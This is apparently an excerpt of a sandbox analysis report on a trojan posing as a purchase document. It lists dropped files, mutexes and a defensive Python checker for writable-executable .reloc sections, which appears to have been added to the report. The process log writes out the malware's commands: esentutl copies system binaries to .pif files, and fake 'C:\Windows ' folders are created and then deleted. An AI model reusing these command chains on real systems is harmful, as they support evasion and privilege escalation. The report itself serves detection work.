Source: AppVClient.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.9.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java-rmi.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javacpl.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msdtc.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msiexec.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: PerceptionSimulationService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: perfhost.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Locator.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MsSense.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SensorDataService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: snmptrap.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmiregistry.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: servertool.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssvagent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: tnameserv.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: unpack200.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: Spectrum.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ssh-agent.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: TieringEngineService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AgentService.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: vds.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: VSSVC.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wbengine.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WmiApSrv.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: wmpnetwk.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ie_to_edge_stub.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: cookie_exporter.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: identity_helper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe0.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: msedgewebview2.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: MavInject32.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: OfficeC2RClient.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3Help.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: officesvcmgr.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: chrome_pwa_launcher.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: chrmstp.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: setup.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: notification_helper.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.dr; Static PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
                    Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.dr; Static PE information: Section: .rsrc ZLIB complexity 0.9989003576744956
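Every dropped file listed above has a .reloc section flagged IMAGE_SCN_MEM_EXECUTE together with IMAGE_SCN_MEM_WRITE. A linker emits relocation data as IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ, so a writable, executable .reloc is a cheap triage indicator for an infected or tampered PE. The following is an added example, not part of the Joe Sandbox report: a minimal section-table parser that applies that check. The PE images it scans are constructed in the block (headers only, not loadable); build_pe, NORMAL_RELOC and the flagging rule are my own choices.

```python
import struct

# Section characteristic bits (winnt.h)
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_DISCARDABLE      = 0x02000000
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000

# What a linker normally emits for .reloc: initialized data, discardable, read-only.
NORMAL_RELOC = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_DISCARDABLE | IMAGE_SCN_MEM_READ


def parse_sections(data: bytes):
    """Walk DOS header -> PE signature -> COFF header -> section table; return [(name, flags)]."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]       # NumberOfSections
    size_of_optional = struct.unpack_from("<H", data, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + size_of_optional                             # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                                         # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        flags = struct.unpack_from("<I", data, off + 36)[0]          # Characteristics
        sections.append((name, flags))
    return sections


def suspicious_sections(data: bytes):
    """Flag W+X sections and any .reloc whose flags differ from the normal read-only data layout."""
    findings = []
    for name, flags in parse_sections(data):
        wx = flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE
        odd_reloc = name == ".reloc" and flags != NORMAL_RELOC
        if wx or odd_reloc:
            findings.append((name, f"0x{flags:08X}"))
    return findings


def build_pe(sections):
    """Construct a minimal PE32 image (headers + section table only) for test input.
    This is a constructed fixture, not a real binary; sections is a list of (name, flags)."""
    size_of_optional = 224                      # PE32 optional header, left zeroed
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)       # e_lfanew -> PE signature right after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_of_optional, 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i, 0, 0, 0, 0, flags)
        for i, (name, flags) in enumerate(sections)
    )
    return bytes(dos) + b"PE\0\0" + coff + bytes(size_of_optional) + table


# Constructed inputs: a clean layout, and one with the .reloc flags seen on the dropped files in this report.
CLEAN_PE = build_pe([
    (".text",  IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data",  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".reloc", NORMAL_RELOC),
])
INFECTED_PE = build_pe([
    (".text",  IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data",  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".reloc", NORMAL_RELOC | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    print("clean:", suspicious_sections(CLEAN_PE))        # []
    print("infected:", suspicious_sections(INFECTED_PE))  # [('.reloc', '0xE2000040')]
```

To run this over the real dropped files, read each one with open(path, "rb") and pass the bytes to suspicious_sections; the parser only touches the headers, so it is safe on arbitrary input as long as you catch ValueError and struct.error for non-PE or truncated files.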
                    Source: classification engine; Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/171@31/13
                    Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe; Code function: 0_2_02B17FD2 GetDiskFreeSpaceA, 0_2_02B17FD2
                    Source: C:\Users\Public\Libraries\ymafvvdS.pif; Code function: 9_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear, 9_1_004019F0
                    Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe; Code function: 0_2_02B26DC8 CoCreateInstance, 0_2_02B26DC8
                    Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe; File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
                    Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe; File created: C:\Users\Public\Libraries\PNO
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                    Source: C:\Users\Public\Libraries\ymafvvdS.pif; Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-3f155f6931e417df62e80848-b
                    Source: C:\Users\Public\Libraries\ymafvvdS.pif; Mutant created: NULL
                    Source: C:\Users\Public\Libraries\ymafvvdS.pif; Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-3f155f6931e417df-inf
                    Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7860:120:WilError_03
                    Source: C:\Windows\System32\alg.exe; Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-3f155f6931e417df9ea72c54-b
                    Source: C:\Windows\System32\FXSSVC.exe; File created: C:\Windows\TEMP\FXSSVCDebugLogFile.txt
                    Source: C:\Users\Public\Libraries\ymafvvdS.pif; Command line argument: 08A (9_1_00413780)
                    Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe; Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | ReversingLabs: Detection: 36%
Source: PURCHASE REQUIRED DETAILS 000487958790903403.exe | Virustotal: Detection: 43%
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | File read: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe
Source: unknown | Process created: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe "C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe"
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ymafvvdS.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe /d C:\\Users\\Public\\Libraries\\Sdvvfamy.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PURCHASE REQUIRED DETAILS 000487958790903403.exe | Process created: C:\Users\Public\Libraries\ymafvvdS.pif C:\Users\Public\Libraries\ymafvvdS.pif
Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif | Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown | Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown | Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown | Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown | Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown | Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown | Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: unknown | Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
